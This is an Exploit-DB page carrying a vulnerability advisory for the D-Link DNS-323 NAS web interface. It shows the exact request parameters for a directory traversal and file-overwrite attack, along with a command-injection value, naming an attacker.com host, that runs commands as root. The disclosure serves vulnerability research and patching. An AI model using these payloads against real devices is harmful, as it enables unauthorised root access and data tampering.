D-Link DNS-323 - Multiple Vulnerabilities

EDB-ID:

25142

CVE:


EDB Verified:

Author:

sghctoma

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2013-05-02

Vulnerable App: 
###############################################################################
# Exploit Title: D-Link DNS-323 Multiple Vulnerabilities 
# Author: sghctoma
# E-mail: tamas.szakaly@praudit.hu
# Category: Hardware
# Vendor: http://www.dlink.com/
# Firmware Version: 1.09
# Product: http://www.dlink.com/us/en/support/product/dns-323-1tb-sharecenter-2-bay-network-storage-sata-raid-0-1-usb-print-server
###############################################################################

.intro
======

DNS-323 is a NAS product from D-Link with a web GUI. The GUI is vulnerable to
multiple attacks described below. Both vulns are inthe "SCHEDULE DOWNLOAD" page,
and both require authentication. However a normal user is enough, no need for
admin.

.vulnerabilites
===============

.arbitrary file upload
----------------------
When one clicks in the "Save To" textbox or the "Browse" button, a popup appears
with the directories on the "Volume_1" share. When one clicks the "+" sign to
open a directory, a POST request is sent to /goform/GetNewDir with the following
parameters:

fNEW_DIR		/mnt/Volume_1
f_backup		0
f_IP_address	<ip address of NAS>
f_file			0

A directory traversal is possible via the fNEW_DIR variable, and we can browse
not only the directories, but the files too with setting f_file to "1". So, for
example with the following params one can browse /:

fNEW_DIR		/mnt/Volume_1/../../
f_backup		0
f_IP_address	<ip address of NAS>
f_file			1

So, this way we can browse the entire directory tree, and we can schedule a
download to wherever we want. (e.g. overwrite /etc/shadow - oh, yes, we are
doing everything as root, btw.)

.OS command execution
---------------------

When one clicks the "play button" on a scheduled download, a POST request is
sent to /goform/right_now_d with the following parameter:

T1	<at job id>,SCHEDULE<num>,<user>,<source>,<destination>,<num>

SCHEDULE<num> is injectable, so for example setting T1 to the following writes
the output of the "id" command to a web accessible file:

11,SCHEDULE13 && id > /web/path/id.txt,dns323,ftp://attacker.com/dummy.txt,/Volume_1/Public,1

After such query we can visit <NAS address>/web/path/id.txt, and we will see the
following content:

uid=0(root) gid=0(root)

###############################################################################
Screenshots and a write-up of these vulns in Hungarian is available at the
following URL: http://praudit.hu/index.php/blog/nassoljunk
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services